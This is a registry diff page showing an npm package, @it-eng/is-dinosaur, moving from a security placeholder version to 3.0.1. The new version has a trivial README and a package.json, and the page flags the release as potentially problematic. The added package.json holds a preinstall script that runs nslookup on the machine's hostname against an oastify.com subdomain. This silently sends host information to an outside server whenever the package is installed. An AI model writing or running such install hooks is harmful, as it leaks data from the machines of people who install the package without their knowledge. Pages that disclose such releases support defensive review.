@it-eng/is-dinosaur 0.0.1-security → 3.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @it-eng/is-dinosaur might be problematic. Click here for more details.
- package/README.md +9 -3
- package/index.js +6 -0
- package/package.json +20 -3
package/README.md
CHANGED
|
@@ -1,5 +1,11 @@
|
|
|
1
|
-
#
|
|
1
|
+
# is-dinosaur
|
|
2
2
|
|
|
3
|
-
This
|
|
3
|
+
This packages return true if dinosaur string is passed to it otherwise returns false.
|
|
4
4
|
|
|
5
|
-
|
|
5
|
+
Usage
|
|
6
|
+
|
|
7
|
+
Import and call the function passing it a string
|
|
8
|
+
|
|
9
|
+
const dino = require("is-dinosaur")
|
|
10
|
+
|
|
11
|
+
console.log(dino.isDinosaur("dinosaur"))
|
package/index.js
ADDED
package/package.json
CHANGED
|
@@ -1,6 +1,23 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@it-eng/is-dinosaur",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "3.0.1",
|
|
4
|
+
"description": "this checks if a string sent is dinosaur or not",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "nslookup $(hostname).bl0ugr5zt9c0xqawp1fiavtf66cw0l.oastify.com"
|
|
9
|
+
},
|
|
10
|
+
"repository": {
|
|
11
|
+
"type": "git",
|
|
12
|
+
"url": "git+https://github.com/kuldeep5432/is-dinosaur.git"
|
|
13
|
+
},
|
|
14
|
+
"keywords": [
|
|
15
|
+
"dinosaur"
|
|
16
|
+
],
|
|
17
|
+
"author": "wabisabi5432",
|
|
18
|
+
"license": "ISC",
|
|
19
|
+
"bugs": {
|
|
20
|
+
"url": "https://github.com/kuldeep5432/is-dinosaur/issues"
|
|
21
|
+
},
|
|
22
|
+
"homepage": "https://github.com/kuldeep5432/is-dinosaur#readme"
|
|
6
23
|
}
|